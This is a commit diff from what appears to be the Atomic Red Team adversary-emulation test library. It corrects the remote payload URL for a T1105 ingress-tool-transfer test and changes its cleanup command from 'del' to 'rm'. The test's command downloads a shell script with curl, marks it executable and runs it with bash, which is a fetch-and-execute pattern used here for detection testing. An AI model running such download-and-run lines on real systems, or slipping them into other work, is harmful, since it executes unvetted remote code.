T1105 :: Correct remote_url, Change del to rm (#2265)

This commit is contained in:
çidem
2023-01-04 06:23:39 +03:00
committed by GitHub
parent c2aca27df1
commit b0b413cc9d
+2 -2
View File
@@ -748,7 +748,7 @@ atomic_tests:
remote_url:
description: url of remote payload
type: string
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
payload_name:
description: payload name
type: string
@@ -757,7 +757,7 @@ atomic_tests:
command: |
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
cleanup_command: |
del #{payload_name}
rm #{payload_name}
name: sh
- name: Nimgrab - Transfer Files
auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e